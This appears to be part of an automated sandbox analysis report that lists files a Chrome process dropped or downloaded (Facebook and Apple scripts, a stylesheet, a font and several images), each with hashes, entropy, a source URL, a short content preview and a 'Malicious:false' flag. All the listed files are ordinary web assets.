                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AdsObjectTypes",[],(function(a,b,c,d,e,f){a=Object.freeze({ACCOUNT:"ACCOUNT",ADGROUP:"ADGROUP",AUDIENCE:"AUDIENCE",BUSINESS_ACCOUNT:"BUSINESS_ACCOUNT",CAMPAIGN:"CAMPAIGN",CAMPAIGN_GROUP:"CAMPAIGN_GROUP",CREATION_PACKAGE:"CREATION_PACKAGE",CREATIVE:"CREATIVE",HISTORY:"HISTORY",OPPORTUNITIES:"OPPORTUNITIES",PIXEL:"PIXEL",PRIVACY_INFO_CENTER:"PRIVACY_INFO_CENTER",TRANSACTION:"TRANSACTION",MESSAGES:"MESSAGES"});f["default"]=a}),66);.__d("AdsALSubsurface",["AdsObjectTypes"],(function(a,b,c,d,e,f,g){"use strict";var h=(f={},f[c("AdsObjectTypes").CAMPAIGN_GROUP]="campaign",f[c("AdsObjectTypes").CAMPAIGN]="adset",f[c("AdsObjectTypes").ADGROUP]="ad",f);function a(a,b){return a+":"+b}function b(a){var b;if(a==null)return;return(b=h[a])!=null?b:a.toLowerCase()}function d(a){return a}function e(a){return a==null?"":a}g.getFullSurfaceString=a;g.getAdsObjectTypeSubsurface=b;g.getAdObjectLevelSubsurface=d;g.getDynamicSubsurface=e}),98);.__d("Currency",["CurrencyConfig"],(funct
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (20398)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):354326
                                                                                                                                                                                                                                Entropy (8bit):5.402542515680638
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:Wjx6Fh5yD6y2yjEKLPGMZMg9bV4XG77jzfwWEf8/:Wsv8D6y0KLPGMZZ9bVj7wWEf8/
                                                                                                                                                                                                                                MD5:25E4014B07BBBA82DAF9E43D50280FB8
                                                                                                                                                                                                                                SHA1:465FF25F0AACB572CD6F701D76CCBF3897951E65
                                                                                                                                                                                                                                SHA-256:C92D4A3BB4BDC316E737064741F09C6079E8C5352E4D7E3286D9CD08329D8FAF
                                                                                                                                                                                                                                SHA-512:79FB0B015225233A7CBB4391DEC5573F9EC274346129DDD24F3787F5CDB09370A839EC6C04629CEFC7CB1DC2DEB241FE2BDBD88AE2A9661D9983251AA93B32DF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/.."use strict";(function(){var a=typeof globalThis!=="undefined"&&globalThis||typeof self!=="undefined"&&self||typeof global!=="undefined"&&global;if(typeof a.AbortController!=="undefined")return;var b=function(){function a(){this.__listeners=new Map()}a.prototype=Object.create(Object.prototype);a.prototype.addEventListener=function(a,b,c){if(arguments.length<2)throw new TypeError("TypeError: Failed to execute 'addEventListener' on 'CustomEventTarget': 2 arguments required, but only "+arguments.length+" present.");var d=this.__listeners,e=a.toString();d.has(e)||d.set(e,new Map());var f=d.get(e);f.has(b)||f.set(b,c)};a.prototype.removeEventListener=function(a,b,c){if(arguments.length<2)throw new TypeError("TypeError: Failed to execute 'addEventListener' on 'CustomEventTarget': 2 arguments required, but only "+arguments.length+" present.");var d=this.__listeners,e=a.toString();if(d.has(e)){var f=d.get(e);f.has(b)&&f["delete"](b)}};a.prototype.dispatchEvent=function(a){if
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):75826
                                                                                                                                                                                                                                Entropy (8bit):7.9957491622723245
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:1536:oZb6ILUjdBFM/mo1Ysk+RCS+x2Y/+4Qwwe0uLfgu93TfDiDP1w2:W6U4BFYmo1U+E/4zwwqrCq2
                                                                                                                                                                                                                                MD5:36FB55BBCCA237887CD2D16C8EEF8693
                                                                                                                                                                                                                                SHA1:12A2DF1B3993E8D02B7C88B25A6FBE83D4FCAE8F
                                                                                                                                                                                                                                SHA-256:FDA7D35F1C33D32981497844E22307A4E27C82836FBFC63444906C4ED73AC4B8
                                                                                                                                                                                                                                SHA-512:877F4C53FBBCEAFD52D2D43BBB68D409941E9B5401C76ABD726AD670BD2FE3073BBB251E5F7DF1B4DC3164D1FA8F7D141A784D93BD9EC78978F132396A233BD2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://play-lh.googleusercontent.com/K6kGejYk6GTdg5AenV4A0e-Nc48xjZ_-Qj50IUO5pUCf0V6EpJbeOku4Rk73atcPD4A=w416-h235-rw
                                                                                                                                                                                                                                Preview:RIFF*(..WEBPVP8L.(../..2.MH..6l....I..?...BD.'@j...~&...fw....m{Y....>...=.@....V.....*.+..:..=.N.., ..I.\.{...8H....$d...;I..9..HU.A`B.s...$..#.\.&@.G..e{...l@I..7...x.@q-p.9....,..{.}....4.....cZ....@(`......-.[..yN.@/`L/.1(yb>.m}.*..m $.WU.4Q$.=....!Ik....(.........s...UpWIu?.....g.....d{K[.....EC..8).....O.jI\R....7@o.R..n.V..$.....{.z....~.GZ....e...[......[-iI.]^.6..-)urH.e.P..).:...k....|.9m....m...%N...U.....g%.<a.......Ef<.....?..H...Xp.L......L... .......P..n.%c.j{F.-.k.......*..[...V.........&UU./m.....=..-E.].N.?o....(....W.......l.....A.Rm..,......!..h..I...?..O/...o.4.mko.F......\...B..9V.....R.`...?..!..WU..{".PTI%.2....8-.fE1.}...@..PQ.&....C...(..Q...Q.1$..b$..J.1......C..;..3w...R..#z\.T*.!C......#..+.J8...0..K.;....dH.D.....@..k..#..J...^........k@"*...+...t.c..x.;.}...E'.0.Z_....{\...;.".J.....L.Mm.v..G...W.3<..bx.,......|........v..$N.....9ztA.T.....4|.P.&u...t.p.g..v...b.1..?....,..-.........[.O..x.&.S...(.....J.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3260)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):10762
                                                                                                                                                                                                                                Entropy (8bit):5.379732879924647
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:w5/cOvikJSBxiFoFBgUpLJOH/+p/q0BK62dpYxqxO41GHtH8o1GiKSW8fpIHZ:A/cUxR3UBJOh9tOnNHHFROZ
                                                                                                                                                                                                                                MD5:6B937B2E35342EA3AA6B42163A1D0E80
                                                                                                                                                                                                                                SHA1:EC2DFA3F6FE73EEA1856EC8110F7CFA31BBE5BB4
                                                                                                                                                                                                                                SHA-256:413A46CE279B3DFCBFF61C1AF7BE32656675E47336B6301701F701902EBF53B8
                                                                                                                                                                                                                                SHA-512:B458B6CFB298EE079FDDBE9011E6A422BB79EE0DEB545422D9EBFA3D752FBDB0C355874D710B6F4DC73EE78776C166107760C189854ED7CAE2605529E5C113D9
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("Button",["csx","cx","invariant","CSS","DOM","DataStore","Event","Parent","emptyFunction","isNode"],(function(a,b,c,d,e,f,g,h,i,j){var k="uiButtonDisabled",l="uiButtonDepressed",m="_42fr",n="_42fs",o="button:blocker",p="href",q="ajaxify";function r(a,b){var e=d("DataStore").get(a,o);b?e&&(e.remove(),d("DataStore").remove(a,o)):e||d("DataStore").set(a,o,c("Event").listen(a,"click",c("emptyFunction").thatReturnsFalse,c("Event").Priority.URGENT))}function s(a){a=d("Parent").byClass(a,"uiButton")||d("Parent").bySelector(a,"._42ft");if(!a)throw new Error("invalid use case");return a}function t(a){return c("DOM").isNodeOfType(a,"a")}function u(a){return c("DOM").isNodeOfType(a,"button")}function v(a){return d("CSS").matchesSelector(a,"._42ft")}var w={getInputElement:function(a){a=s(a);if(t(a))throw new Error("invalid use case");if(u(a)){a instanceof HTMLButtonElement||j(0,21261);return a}return c("DOM").find(a,"input")},isEnabled:function(a){return!(d("CSS").hasClass(s
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:exported SGML document, ASCII text, with very long lines (29520)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):48388
                                                                                                                                                                                                                                Entropy (8bit):5.340300592331525
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:QT3Cl3UR5FlxRBsVZv2r4vlroHKay9/KUbBfNfGg2TnDdQs5CNthxTB3eARGTB:CBbFlxRRrPAYfWs5sB3m
                                                                                                                                                                                                                                MD5:426A047712898C9013413A616E114856
                                                                                                                                                                                                                                SHA1:D8BBB2BB88E1A10EED479E29A01DADE993435DBC
                                                                                                                                                                                                                                SHA-256:D6D27667E77D5FE0560934B1891C821C8F6C3392DC11E89EE73C3C6AE5F13399
                                                                                                                                                                                                                                SHA-512:9391D1B91C9D967C0B2E168231A7C18C3547782AB1CE726B10E2E10FCA513DF0CF18F4ECB668D19F11549DA78CF98E5F5DF2FBD5C031597F7C16C7765D3B5DED
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3ij9m4/yu/l/en_GB/GcN06huceZG.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AsyncDOM",["CSS","DOM","FBLogger"],(function(a,b,c,d,e,f){a={invoke:function(a,c){for(var d=0;d<a.length;++d){var e=a[d],f=e[0],g=e[1],h=e[2];e=e[3];h=h&&c||null;g&&(h=b("DOM").scry(h||document.documentElement,g)[0]);h||b("FBLogger")("async_dom").warn("Could not find relativeTo element for %s AsyncDOM operation based on selector: %s",f,g);switch(f){case"hide":b("CSS").hide(h);break;case"show":b("CSS").show(h);break;case"setContent":b("DOM").setContent(h,e);break;case"appendContent":b("DOM").appendContent(h,e);break;case"prependContent":b("DOM").prependContent(h,e);break;case"insertAfter":b("DOM").insertAfter(h,e);break;case"insertBefore":b("DOM").insertBefore(h,e);break;case"remove":b("DOM").remove(h);break;case"replace":b("DOM").replace(h,e);break;default:b("FBLogger")("async_dom").warn("Received invalid command %s for AsyncDOM operation",f)}}}};e.exports=a}),null);.__d("AsyncResponse",["invariant","Bootloader","FBLogger","HTML","WebDriverConfig"],(function(a,b
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3038)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):18941
                                                                                                                                                                                                                                Entropy (8bit):5.490259234595834
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:tU4yDsD1OFIQ6GT4n9SiSAi7xnBGa8s8qVLevj9vPNpDVeVSA2aUjZAKYDgocOb3:VyDe1Oia+9SGDbaUj+nDJb
                                                                                                                                                                                                                                MD5:FB5DEFA61F6FB338A356269C5ABA01EC
                                                                                                                                                                                                                                SHA1:D883B45E47CF0AC862C9E0AC50744181273109FC
                                                                                                                                                                                                                                SHA-256:4F3390730744441B70F7D2285B715923257BF0B002C1B0D3EBF476C963710084
                                                                                                                                                                                                                                SHA-512:9D1A936FED61E58AF0D7406B06DF4C41DFE1B3FC0FABCB1D15B20891879D5DF39FF53528FF4858EF7661575694FB2AC73B24F7A1622556D853F6F399214405EA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/P-sBcB8ct1C.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AdsPerfTiming",["performance"],(function(a,b,c,d,e,f,g){"use strict";var h;b=(h||(h=c("performance"))).timing&&(h||c("performance")).timing.fetchStart||a._cstart;g.start=b}),98);.__d("BinarySearch",["unrecoverableViolation"],(function(a,b,c,d,e,f,g){"use strict";e={GREATEST_LOWER_BOUND:"GREATEST_LOWER_BOUND",GREATEST_STRICT_LOWER_BOUND:"GREATEST_STRICT_LOWER_BOUND",LEAST_STRICT_UPPER_BOUND:"LEAST_STRICT_UPPER_BOUND",LEAST_UPPER_BOUND:"LEAST_UPPER_BOUND",NEAREST:"NEAREST"};var h=function(a,b){if(typeof a!=="number"||typeof b!=="number")throw c("unrecoverableViolation")("The default comparator can only be used with sequences of numbers.","comet_infra");return a-b},i=e.GREATEST_LOWER_BOUND,j=e.GREATEST_STRICT_LOWER_BOUND,k=e.LEAST_STRICT_UPPER_BOUND,l=e.LEAST_UPPER_BOUND,m=e.NEAREST;function n(a,b,c,d,e){e===void 0&&(e=h);var f=l;f=p(a,b,c,d,e,f);if(c<=f&&f<d){c=a(f);return e(c,b)===0?c:void 0}else return void 0}function o(a,b,c,d,e){e===void 0&&(e=h);var f=l;f=p(a
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (5264)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):19109
                                                                                                                                                                                                                                Entropy (8bit):5.306733844584032
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:mAjHWQIcLvvbeje34p4SFimdh/nWrQ8ekgtocqS04ZrahU6M/MhlxvXyYHYadMIE:Riiqi3QFiuPkg7qaZWhBMOlxvXVo
                                                                                                                                                                                                                                MD5:89EB93272AB81EA04A7890E1F270EB00
                                                                                                                                                                                                                                SHA1:42DBDAF298DE10D9B4304C2407EFA15B66BBE38C
                                                                                                                                                                                                                                SHA-256:EB4942819765B3C2D89FDB417F002D6002D07677F33682D6AFA93C45D0C4A020
                                                                                                                                                                                                                                SHA-512:05F688EDF1444E15ABFDD4469667BE4835D99A54D062B165AD5D94261E3ABD3EE4F59E7B0A53A0E341D2704D2F6675EEB10E42570E671871C72240B380E16D22
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/G4oeeXLdsEE.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AdsALSurfaceMessagePlugin",["feature"],(function(a,b,c,d,e,f,g){"use strict";function a(){var b=babelHelpers.taggedTemplateLiteralLoose(["ABPInfra_DeliveryProducts_Guidance"]);a=function(){return b};return b}b={type:"alSurface",key:"msg",logKey:"msg",feature:d("feature").feature(a())};c=b;g["default"]=c}),98);.__d("AdsALMessageSurface.react",["AdsALSubsurface","AdsALSurfaceConditional","AdsALSurfaceMessagePlugin","react"],(function(a,b,c,d,e,f,g){"use strict";var h;h||d("react");a=function(a){var b=a.children,e=a.moduleId;a=babelHelpers.objectWithoutPropertiesLoose(a,["children","moduleId"]);return c("AdsALSurfaceConditional")(babelHelpers["extends"]({surface:c("AdsALSurfaceMessagePlugin"),subsurface:d("AdsALSubsurface").getDynamicSubsurface(e.replace(".react",""))},a,{capability:babelHelpers["extends"]({},a.capability,{trackVisibilityThreshold:.5})}))(b)};g.AdsALMessageSurface=a}),98);.__d("AdsInterfacesRouteBuilder",["ifRequired","performanceNow"],(function(a,
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (13410)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):34085
                                                                                                                                                                                                                                Entropy (8bit):5.435704551331771
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:BvKS9nEmwgCl8m84sBjX/ECRTLJMyECvwcZ+/lME2xngK3pX0Zl33t1SDCKc0Rq9:119EFl84sBjCyQoRCZBRgbO
                                                                                                                                                                                                                                MD5:55A61069B39F2F3F12CC81A90863870B
                                                                                                                                                                                                                                SHA1:6DAC0396D28002872C4DE3FB43B12ABA2EC95C17
                                                                                                                                                                                                                                SHA-256:2B16C355C8A82BD130D62F86AEEAB7B8901EDADDF560F06B546F4A3A8D6A849D
                                                                                                                                                                                                                                SHA-512:582905B7F4865B393DCE75F19F4B4D7467D629803F8D5E2178E8AE760DAFF934FC2F7CDAEE20D3964A2F882B2B1D9775D5AA2B5D3BD57182030354C0B185FD23
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3iKG04/yD/l/en_GB/-StUlb9du6-.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("DevsiteAudienceNetworkTrackingPixels",["Event"],(function(a,b,c,d,e,f,g){"use strict";!function(a,b,c,d,e,f,g){if(a.fbq)return;e=a.fbq=function(){e.callMethod?e.callMethod.apply(e,arguments):e.queue.push(arguments)};a._fbq||(a._fbq=e);e.push=e;e.loaded=!0;e.version="2.0";e.queue=[];f=b.createElement(c);f.async=!0;f.src=d;g=b.getElementsByTagName(c)[0];g.parentNode.insertBefore(f,g)}(window,document,"script","https://connect.facebook.net/en_US/fbevents.js");var h="1668333663438923";function a(){window.fbq("init",h)}function b(a,b){window.fbq("trackCustom",a,babelHelpers["extends"]({},b))}function d(a,b,d,e){c("Event").listen(d,e,function(){window.fbq("trackCustom",a,babelHelpers["extends"]({},b))})}g.init=a;g.track=b;g.setupEventTracker=d}),98);.__d("DevsitePartnershipsTrackingPixels",["Event"],(function(a,b,c,d,e,f,g){"use strict";!function(a,b,c,d,e,f,g){if(a.fbq)return;e=a.fbq=function(){e.callMethod?e.callMethod.apply(e,arguments):e.queue.push(arguments)};a._
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (724)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):3131
                                                                                                                                                                                                                                Entropy (8bit):5.246173796640573
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:k7gTPIxrgNk+OZISf+rCefwd7uxxYwLMOSTg7DytCujN:AgTwFguvZISfwfwd7uxewATS+TN
                                                                                                                                                                                                                                MD5:BBB8A6A4C57FBA38147BF928DACA2BE0
                                                                                                                                                                                                                                SHA1:BC018658ADD75DFA04B909CE57B0013A521EC56D
                                                                                                                                                                                                                                SHA-256:84C5AFB68EAE9AAD4626AA1C0481450381873A7AAA362E6A2C8F3F7FB428164C
                                                                                                                                                                                                                                SHA-512:4DCE66AB3260D3CAFDE0D2AAF9315AE01F0697E0D99E67D4C4AAD292663F5C24434BDCBE73688027EC3149ED6F1C98B360E01941D3F05A774BDAECFA4A880B17
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://static.xx.fbcdn.net/rsrc.php/v3/yU/l/0,cross/ODVjh0Ni5D7.css"
                                                                                                                                                                                                                                Preview:._38h7{background-color:#fff;border:1px solid #dddfe2;border-radius:7px;height:467px;overflow:hidden;position:relative;width:495px}._3a5o{background-color:#fff;box-sizing:border-box;height:100%;padding:24px;position:absolute}._38gw{left:0;opacity:1;text-align:center;transition-duration:.5s;width:100%}._38gz{opacity:0;transition-duration:10}._38h2{left:100%;transition-duration:.5s}._38h3{left:0;transition-duration:.5s}._38em{height:200px}._3a5p{padding-bottom:42px;padding-top:30px}._63d-{color:#000;display:block;font-size:18px;font-weight:bold;line-height:20px;padding-bottom:12px}._63d_{color:#90949c;font-size:14px;line-height:20px}._4zcq{bottom:24px;position:absolute;width:406px}.._1bux{width:100%}._2a1b{width:100%}._2a1b._4ehf{width:100%}._1bux ._58ak{background:transparent;width:100%}._h8g,._h8g._58ak,._2a18 ._58ak{border-color:#dadde1}._h8h,._2a1a ._58ak{border-color:#3776ff}._h8h,._h8h ._58ak{border-color:#3776ff}._1buy{font-size:12px;font-weight:bold;line-height:14px}._kz2{font-si
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 97812, version 1.0
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):97812
                                                                                                                                                                                                                                Entropy (8bit):7.9978966269531435
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:1536:MxlNoV+iuaRqgnUJ9gPxMZXFwme9Xvaw8aeyH17mP4bTJagZcXU4N/42Y/4g2H4O:MLNoVXuaogUQyZVPeB0yHB9bhoU4NrYc
                                                                                                                                                                                                                                MD5:FCF85E1007388C2707C982FB27D09163
                                                                                                                                                                                                                                SHA1:1329D694C10F4F8DC05AEF70257E93D0481ECCB5
                                                                                                                                                                                                                                SHA-256:878C9752B9A516DDE472D30E4E5C57172B2E766CF21F336DF168E2302382CA0E
                                                                                                                                                                                                                                SHA-512:B1ED620469C913144DEB20BA1984DAC483112554ACE2320ACFA0F17CD529D3A0CA2F9B06AE0F7F819136842C798F05DECB16A2DCA77D126428FB0FEA9401344E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://www.apple.com/wss/fonts/SF-Pro-Display/v2/sf-pro-display_regular.woff2
                                                                                                                                                                                                                                Preview:wOF2......~....... ...}............................$..H.`*H...X...`....6.$..$..(.. ?meta....X. 8.t[.,.......?...t.!.......F..R.~..CL-8..C.F4..UW..3.m..u..1..[9*...........|y...o.......b.Z.....D..1.EL%E..".....iS.Rb].y..j...YBX*..R05%3%..$..ZF..Ok7.~......lSR......6.e.....yz...F<..FU....Q..H.)....p".m.+..".~..Y.......@#.........tQ.y~..q92.c..GO.`..x*..p.|RD....7.....T.......b.*+u\@.W:....T.u.... .AB.$>. E1.A......?.,.!m..).~e......gd.....v.4..i......<......^e.3.R.J.V4;_..{....tV..Q.._.l....E..,F..\.b.. ...*...........{..(......C.".......z{...g...F...h+A^...<..\..c..MP.J*..... ....Q+v.5.9E\.q...h..D..%"...p......}Z._..#..8A..w....5[.<|@v&..1C...m3?w...n...r|0d{....d./...[.-A.Crre .Ds.T....F.5U.Ly....#rs..?...7%@......a2.B.b7L.....>.=.. ...~..2..o........mo. \C@5W.6....6.i....w...@s.ww+.F..D..h..0....k..........H...l......AR...l.X...n..d....1`T..b`$`...........i....?@s..#. .A0..c..e...6j.....="[T.B.......W?.......}...7.,...5...n..6...Z..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (64911)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):159823
                                                                                                                                                                                                                                Entropy (8bit):5.360552525801775
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:Qn0LW284gFw6lgZKGj6w9lzL6w1lKPquN2TFOkw6l7cjCYpDb:Qn0LWwLgP5N2JXcjCYpH
                                                                                                                                                                                                                                MD5:2EFEBD43F4E83C7A2A0DE88076553102
                                                                                                                                                                                                                                SHA1:282DCD7549F99F8465ED2147786886EA74C11652
                                                                                                                                                                                                                                SHA-256:494046D00B8B50FB5CF0992A22FC67134BD10FE701968ACDB817205DA873CCE4
                                                                                                                                                                                                                                SHA-512:1954B77148CB23E0CFA5C1A7CB8AF2BD771F1F2CD27140C9D1C46EA45CF48492D9E91CB3903C920B34DD9EFC46A991E7D5F4DC41F61BEF71BBE3646C17AD6E45
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.import{c as t,a as n}from"./p-2649b6ee.js";import{s as e,f as i}from"./p-bb5da73d.js";import{u as r}from"./p-9d409825.js";import{j as o}from"./p-e6747c77.js";import{n as s}from"./p-a0c067db.js";var u=t((function(t,n){Object.defineProperty(n,"__esModule",{value:!0}),n.camelize=void 0,n.camelize=t=>t.toLowerCase().replace(/[^a-zA-Z0-9]+(.)/g,((t,n)=>n.toUpperCase()))})),a=t((function(t,n){function e(t,n){return Object.prototype.hasOwnProperty.call(Object
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):1158
                                                                                                                                                                                                                                Entropy (8bit):7.642696531716287
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:Autz6/Ko3ZGUMqrN+fIvaEYmFr1fTheqMlbryyFIqVhdfVSGCJ1:AuloNhCItxFr1fQq8brzIifQrJ1
                                                                                                                                                                                                                                MD5:F024DE5B9DC872D1D28CCCE031ED6475
                                                                                                                                                                                                                                SHA1:F7021999034C71C9DA1B42FC9ED6BB347F500F14
                                                                                                                                                                                                                                SHA-256:32AE71600E0F6B7F5A451AC8FF825A225731F1F1A21C54F3ACB35ED69368953B
                                                                                                                                                                                                                                SHA-512:7F6D5E78DE7E52839C542FB377A14332B71AC29E1EEC93678C78D1F9497B02C25C8A95E625709FEF693E9A2D253ED70D075A27CF8FBBA72B346E688ABDF64117
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://is1-ssl.mzstatic.com/image/thumb/Purple221/v4/98/34/f8/9834f897-1802-89f1-2d7e-a570b058ee68/logo_photos_color-0-1x_U007emarketing-0-0-0-6-0-0-0-85-220-0.png/146x0w.webp
                                                                                                                                                                                                                                Preview:RIFF~...WEBPVP8X..............VP8 .........*....>.H.G.$!.I<<D.D..........,.*..S.?o.P.g..~.z.z?.].U...i..b.YjDm...{.a...+.#.+...b.........WeZ..F....w.;.U..A.v..G.0...e.b........Vo.......]G..n..=..'<.'...K.L....m.i...`)....t'h2.....OG.KK..r.....v[.jV.%..}.............9....V.e@gw..f..;"......\...U`h.i5..F~..>qCH.w.U.qm4......7... "....b.t.M6t..~Q.|.....&D9..p.....=H....X..r....o..10f.kD..?.+.R+1..7Z..)v.&h...P&..j.../..ib.....?D..u.....o..........b4....j.G&}.\.6~^..F.O.M#.]..?M...|R.7.X..w..C.Ea..)...?D..a.T..Mt..t............M1.'.|9...%..3\.uv..^;..Z9....."......?.#.>$....F.xV...1g.'.dL....*.Y.|.ck..*..4GR.....LV.Ds..}T....I1)X}q...g.\u.e..>.#7..{...."..@.....K..!o.....b.....)........7.Q.0&-4.....B..@0.&.z..*.z.T..fN3.].....P7...[?...N:w%.*@.bA[.\.W...3.pN.=6'.Y.gZto1= (..b.C..~i8Q9.P.W.i.Bh.!..F.k..T../...h.N:E*..BU.^.......p>.F.6.?.TB...idX.k...w..Q.p...A....L.....|.ST1.H........y2..7m...:..../....V..T....h0..RWFa...!.D....L.f...>...D...
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):9316
                                                                                                                                                                                                                                Entropy (8bit):7.975613114638196
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:rPrx5zvCwQ+82YfPGdlx9Rf15JqIWGdK3Sd2MGy/ly4XA:rPFlvS+ZYXGnR95JfPGy/Xw
                                                                                                                                                                                                                                MD5:8FC6DE8717489411CDE6604CF116FEA1
                                                                                                                                                                                                                                SHA1:B3EF77BC017EA29750E2B30B965BAEFEB7A71E0F
                                                                                                                                                                                                                                SHA-256:B996916C905C959327C530A288D6BA58E3B8AE37BF27CBB77467E97E3139EBC8
                                                                                                                                                                                                                                SHA-512:05A1F23E2AD89410F45C40B06346ACA17582EADC2EEA1AA113A7C100DBE68EC18315A50650BAAE39A9C6F2EF1F9B28224F3102E3A166022D218D19CC93415303
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://play-lh.googleusercontent.com/63RAiBrl7WNn4cjdnuJq66QMzv7Br8RFftmeCwSV_z6z_s3Z8HdIoYERwCEf01m3aQ=w526-h296-rw
